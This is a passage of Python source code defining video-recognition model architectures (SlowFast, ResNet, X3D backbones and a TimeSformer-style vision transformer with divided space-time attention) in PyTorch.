self.s2 = resnet_helper.ResStage(dim_in=[width_per_group + width_per_group // out_dim_ratio, width_per_group // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 4, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner, dim_inner // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
self.s2_fuse = FuseFastToSlow(width_per_group * 4 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4 + width_per_group * 4 // out_dim_ratio, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 8, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 2, dim_inner * 2 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s3_fuse = FuseFastToSlow(width_per_group * 8 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8 + width_per_group * 8 // out_dim_ratio, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 16, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 4, dim_inner * 4 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s4_fuse = FuseFastToSlow(width_per_group * 16 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16 + width_per_group * 16 // out_dim_ratio, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 8, dim_inner * 8 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if cfg.DETECTION.ENABLE:
head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], 1, 1], [cfg.DATA.NUM_FRAMES // pool_size[1][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2] * 2, scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR] * 2, dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]], [cfg.DATA.NUM_FRAMES // pool_size[1][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s1_fuse(x)
x = self.s2(x)
x = self.s2_fuse(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s3_fuse(x)
x = self.s4(x)
x = self.s4_fuse(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class ResNet(nn.Module):
"""
ResNet model builder. It builds a ResNet like network backbone without
lateral connection (C2D, I3D, Slow).
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
Xiaolong Wang, Ross Girshick, Abhinav Gupta, and Kaiming He.
"Non-local neural networks."
https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(ResNet, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a single pathway ResNet model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group], kernel=[temp_kernel[0][0] + [7, 7]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s2 = resnet_helper.ResStage(dim_in=[width_per_group], dim_out=[width_per_group * 4], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4], dim_out=[width_per_group * 8], dim_inner=[dim_inner * 2], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8], dim_out=[width_per_group * 16], dim_inner=[dim_inner * 4], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16], dim_out=[width_per_group * 32], dim_inner=[dim_inner * 8], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5], num_groups=[num_groups], num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, inplace_relu=cfg.RESNET.INPLACE_RELU, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if self.enable_detection:
head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // pool_size[0][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2], scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s2(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s4(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class X3D(nn.Module):
"""
X3D model builder. It builds an X3D network backbone, which is a ResNet.
Christoph Feichtenhofer.
"X3D: Expanding Architectures for Efficient Video Recognition."
https://arxiv.org/abs/2004.04730
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(X3D, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
exp_stage = 2.0
self.dim_c1 = cfg.X3D.DIM_C1
self.dim_res2 = self._round_width(self.dim_c1, exp_stage, divisor=8) if cfg.X3D.SCALE_RES2 else self.dim_c1
self.dim_res3 = self._round_width(self.dim_res2, exp_stage, divisor=8)
self.dim_res4 = self._round_width(self.dim_res3, exp_stage, divisor=8)
self.dim_res5 = self._round_width(self.dim_res4, exp_stage, divisor=8)
self.block_basis = [[1, self.dim_res2, 2], [2, self.dim_res3, 2], [5, self.dim_res4, 2], [3, self.dim_res5, 2]]
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _round_width(self, width, multiplier, min_depth=8, divisor=8):
"""Round width of filters based on width multiplier."""
if not multiplier:
return width
width *= multiplier
min_depth = min_depth or divisor
new_filters = max(min_depth, int(width + divisor / 2) // divisor * divisor)
if new_filters < 0.9 * width:
new_filters += divisor
return int(new_filters)
def _round_repeats(self, repeats, multiplier):
"""Round number of layers based on depth multiplier."""
if not multiplier:
return repeats
return int(math.ceil(multiplier * repeats))
def _construct_network(self, cfg):
"""
Builds a single pathway X3D model.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
w_mul = cfg.X3D.WIDTH_FACTOR
d_mul = cfg.X3D.DEPTH_FACTOR
dim_res1 = self._round_width(self.dim_c1, w_mul)
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[dim_res1], kernel=[temp_kernel[0][0] + [3, 3]], stride=[[1, 2, 2]], padding=[[temp_kernel[0][0][0] // 2, 1, 1]], norm_module=self.norm_module, stem_func_name='x3d_stem')
dim_in = dim_res1
for stage, block in enumerate(self.block_basis):
dim_out = self._round_width(block[1], w_mul)
dim_inner = int(cfg.X3D.BOTTLENECK_FACTOR * dim_out)
n_rep = self._round_repeats(block[0], d_mul)
prefix = 's{}'.format(stage + 2)
s = resnet_helper.ResStage(dim_in=[dim_in], dim_out=[dim_out], dim_inner=[dim_inner], temp_kernel_sizes=temp_kernel[1], stride=[block[2]], num_blocks=[n_rep], num_groups=[dim_inner] if cfg.X3D.CHANNELWISE_3x3x3 else [num_groups], num_block_temp_kernel=[n_rep], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, stride_1x1=cfg.RESNET.STRIDE_1X1, norm_module=self.norm_module, dilation=cfg.RESNET.SPATIAL_DILATIONS[stage], drop_connect_rate=cfg.MODEL.DROPCONNECT_RATE * (stage + 2) / (len(self.block_basis) + 1))
dim_in = dim_out
self.add_module(prefix, s)
if self.enable_detection:
raise NotImplementedError
else:
spat_sz = int(math.ceil(cfg.DATA.TRAIN_CROP_SIZE / 32.0))
self.head = head_helper.X3DHead(dim_in=dim_out, dim_inner=dim_inner, dim_out=cfg.X3D.DIM_C5, num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[cfg.DATA.NUM_FRAMES, spat_sz, spat_sz], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, bn_lin5_on=cfg.X3D.BN_LIN5)
def forward(self, x, bboxes=None):
for module in self.children():
x = module(x)
return x
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.0):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0.0, proj_drop=0.0, with_qkv=True):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = qk_scale or head_dim ** -0.5
self.with_qkv = with_qkv
if self.with_qkv:
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
self.attn_drop = nn.Dropout(attn_drop)
def forward(self, x):
B, N, C = x.shape
if self.with_qkv:
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2]
else:
qkv = x.reshape(B, N, self.num_heads, C // self.num_heads).permute(0, 2, 1, 3)
q, k, v = qkv, qkv, qkv
attn = q @ k.transpose(-2, -1) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
if self.with_qkv:
x = self.proj(x)
x = self.proj_drop(x)
return x
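# A minimal sketch of the multi-head self-attention module (illustrative;
# assumes `torch` is imported earlier in this file). Token count and embedding
# dim are preserved; 197 = 196 patch tokens + 1 cls token is an assumption.
def _demo_attention():
    attn = Attention(dim=768, num_heads=12, qkv_bias=True)
    tokens = torch.randn(2, 197, 768)
    assert attn(tokens).shape == (2, 197, 768)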
def drop_path(x, drop_prob: float=0.0, training: bool=False):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,
the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for
changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use
'survival rate' as the argument.
"""
if drop_prob == 0.0 or not training:
return x
keep_prob = 1 - drop_prob
shape = (x.shape[0],) + (1,) * (x.ndim - 1)
random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)
random_tensor.floor_()
output = x.div(keep_prob) * random_tensor
return output
class DropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=None):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
return drop_path(x, self.drop_prob, self.training)
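# A minimal sketch of stochastic depth (illustrative; assumes `torch` is
# imported earlier in this file). DropPath is the identity in eval mode; in
# train mode each sample is either zeroed or rescaled by 1 / keep_prob.
def _demo_drop_path():
    dp = DropPath(drop_prob=0.5)
    x = torch.ones(8, 16)
    dp.eval()
    assert torch.equal(dp(x), x)
    dp.train()
    assert set(dp(x).unique().tolist()) <= {0.0, 2.0}  # 2.0 == 1 / keep_prob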
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop=0.0, attn_drop=0.0, drop_path=0.1, act_layer=nn.GELU, norm_layer=nn.LayerNorm, attention_type='divided_space_time'):
super().__init__()
self.attention_type = attention_type
assert attention_type in ['divided_space_time', 'space_only', 'joint_space_time']
self.norm1 = norm_layer(dim)
self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
if self.attention_type == 'divided_space_time':
self.temporal_norm1 = norm_layer(dim)
self.temporal_attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
self.temporal_fc = nn.Linear(dim, dim)
self.drop_path = DropPath(drop_path) if drop_path > 0.0 else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x, B, T, W):
num_spatial_tokens = (x.size(1) - 1) // T
H = num_spatial_tokens // W
if self.attention_type in ['space_only', 'joint_space_time']:
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
elif self.attention_type == 'divided_space_time':
xt = x[:, 1:, :]
xt = rearrange(xt, 'b (h w t) m -> (b h w) t m', b=B, h=H, w=W, t=T)
res_temporal = self.drop_path(self.temporal_attn(self.temporal_norm1(xt)))
res_temporal = rearrange(res_temporal, '(b h w) t m -> b (h w t) m', b=B, h=H, w=W, t=T)
res_temporal = self.temporal_fc(res_temporal)
xt = x[:, 1:, :] + res_temporal
init_cls_token = x[:, 0, :].unsqueeze(1)
cls_token = init_cls_token.repeat(1, T, 1)
cls_token = rearrange(cls_token, 'b t m -> (b t) m', b=B, t=T).unsqueeze(1)
xs = xt
xs = rearrange(xs, 'b (h w t) m -> (b t) (h w) m', b=B, h=H, w=W, t=T)
xs = torch.cat((cls_token, xs), 1)
res_spatial = self.drop_path(self.attn(self.norm1(xs)))
cls_token = res_spatial[:, 0, :]
cls_token = rearrange(cls_token, '(b t) m -> b t m', b=B, t=T)
cls_token = torch.mean(cls_token, 1, True)
res_spatial = res_spatial[:, 1:, :]
res_spatial = rearrange(res_spatial, '(b t) (h w) m -> b (h w t) m', b=B, h=H, w=W, t=T)
res = res_spatial
x = xt
x = torch.cat((init_cls_token, x), 1) + torch.cat((cls_token, res), 1)
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
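# --- Illustrative usage (addition, not part of the original file) -----------
# Divided space-time attention expects one [CLS] token followed by H*W*T
# patch tokens; the sketch below checks that a Block round-trips that layout.
def _demo_block_divided():
    B, T, H, W, dim = 2, 2, 2, 2, 64
    blk = Block(dim=dim, num_heads=8, attention_type='divided_space_time')
    x = torch.rand(B, 1 + H * W * T, dim)       # [CLS] + H*W*T patch tokens
    out = blk(x, B, T, W)
    assert out.shape == x.shape                 # token layout is preserved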
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
to_2tuple = _ntuple(2)
class PatchEmbed(nn.Module):
""" Image to Patch Embedding
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, embed_dim=768):
super().__init__()
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
        num_patches = (img_size[1] // patch_size[1]) * (img_size[0] // patch_size[0])
self.img_size = img_size
self.patch_size = patch_size
self.num_patches = num_patches
self.proj = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=patch_size)
def forward(self, x):
B, C, T, H, W = x.shape
x = rearrange(x, 'b c t h w -> (b t) c h w')
x = self.proj(x)
W = x.size(-1)
x = x.flatten(2).transpose(1, 2)
return x, T, W
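# --- Illustrative usage (addition, not part of the original file) -----------
# PatchEmbed folds the time axis into the batch before the 2D conv, so a
# (B, C, T, H, W) clip comes out as (B*T, num_patches, embed_dim), together
# with the frame count T and the patch-grid width W needed for rearranging.
def _demo_patch_embed():
    pe = PatchEmbed(img_size=224, patch_size=16, in_chans=3, embed_dim=768)
    video = torch.rand(2, 3, 8, 224, 224)       # (B, C, T, H, W)
    x, T, W = pe(video)
    assert x.shape == (2 * 8, 14 * 14, 768)     # frames folded into the batch
    assert (T, W) == (8, 14)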
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
def norm_cdf(x):
return (1.0 + math.erf(x / math.sqrt(2.0))) / 2.0
if mean < a - 2 * std or mean > b + 2 * std:
warnings.warn('mean is more than 2 std from [a, b] in nn.init.trunc_normal_. The distribution of values may be incorrect.', stacklevel=2)
with torch.no_grad():
l = norm_cdf((a - mean) / std)
u = norm_cdf((b - mean) / std)
tensor.uniform_(2 * l - 1, 2 * u - 1)
tensor.erfinv_()
tensor.mul_(std * math.sqrt(2.0))
tensor.add_(mean)
tensor.clamp_(min=a, max=b)
return tensor
def trunc_normal_(tensor, mean=0.0, std=1.0, a=-2.0, b=2.0):
"""Fills the input Tensor with values drawn from a truncated
normal distribution. The values are effectively drawn from the
normal distribution :math:`\\mathcal{N}(\\text{mean}, \\text{std}^2)`
with values outside :math:`[a, b]` redrawn until they are within
the bounds. The method used for generating the random values works
best when :math:`a \\leq \\text{mean} \\leq b`.
Args:
tensor: an n-dimensional `torch.Tensor`
mean: the mean of the normal distribution
std: the standard deviation of the normal distribution
a: the minimum cutoff value
b: the maximum cutoff value
Examples:
>>> w = torch.empty(3, 5)
>>> nn.init.trunc_normal_(w)
"""
return _no_grad_trunc_normal_(tensor, mean, std, a, b)
class VisionTransformer(nn.Module):
""" Vision Transformere
"""
def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=False, qk_scale=None, drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.1, hybrid_backbone=None, norm_layer=nn.LayerNorm, num_frames=8, attention_type='divided_space_time', dropout=0.0):
super().__init__()
self.attention_type = attention_type
self.depth = depth
self.dropout = nn.Dropout(dropout)
self.num_classes = num_classes
self.num_features = self.embed_dim = embed_dim
self.patch_embed = PatchEmbed(img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
num_patches = self.patch_embed.num_patches
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
if self.attention_type != 'space_only':
self.time_embed = nn.Parameter(torch.zeros(1, num_frames, embed_dim))
self.time_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, self.depth)]
self.blocks = nn.ModuleList([Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale, drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer, attention_type=self.attention_type) for i in range(self.depth)])
self.norm = norm_layer(embed_dim)
self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=0.02)
trunc_normal_(self.cls_token, std=0.02)
self.apply(self._init_weights)
if self.attention_type == 'divided_space_time':
i = 0
for m in self.blocks.modules():
m_str = str(m)
if 'Block' in m_str:
if i > 0:
nn.init.constant_(m.temporal_fc.weight, 0)
nn.init.constant_(m.temporal_fc.bias, 0)
i += 1
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=0.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token', 'time_embed'}
def get_classifier(self):
return self.head
def reset_classifier(self, num_classes, global_pool=''):
self.num_classes = num_classes
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
def forward_features(self, x):
B = x.shape[0]
x, T, W = self.patch_embed(x)
cls_tokens = self.cls_token.expand(x.size(0), -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
if x.size(1) != self.pos_embed.size(1):
pos_embed = self.pos_embed
cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
P = int(other_pos_embed.size(2) ** 0.5)
H = x.size(1) // W
other_pos_embed = other_pos_embed.reshape(1, x.size(2), P, P)
new_pos_embed = F.interpolate(other_pos_embed, size=(H, W), mode='nearest')
new_pos_embed = new_pos_embed.flatten(2)
new_pos_embed = new_pos_embed.transpose(1, 2)
new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
x = x + new_pos_embed
else:
